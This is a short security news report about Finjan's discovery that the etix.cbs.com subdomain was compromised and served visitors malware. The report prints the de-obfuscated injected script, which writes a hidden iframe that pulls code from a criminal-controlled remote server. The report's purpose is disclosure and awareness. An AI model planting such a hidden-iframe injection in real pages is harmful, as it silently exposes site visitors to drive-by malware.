CBS.com Subdomain Compromised, Installing Malware On Visitors PC’s
Once again legitimate website was infected with malicious obfuscated code, this time it was CBS.com. It seems popular sites with very high traffic remain a favorite and highly effective attack vector for hackers.
Today Finjan has revealed that the subdomain of a famous radio and television network, etix.cbs.com, was compromised as a result of malicious activity. The cybercriminals added a malicious obfuscated script to the infected page. The injected script added a malicious IFrame to the page.
The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. De-obfuscated script code from cbs.com sub-domain:
<SCRIPT> window.status=’Done’; document.write(‘<iframe name=29dee5c6 src=’http://[REMOVED]/.if/go.html?’ +Math.round(Math.random()*257224)+’3e78’ width=632 height=407 style=’display: none’></iframe>’) </SCRIPT>
The malicious Russian server, from which the IFrame pulled the malicious code located in Saint Petersburg, hosted by “ZAO National Telecomunications ISP”.
Finjan immediately informed CBS.com of the infection and currently the remote Russian server is down.
More on CyberInsecure:
Leave a Reply
Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.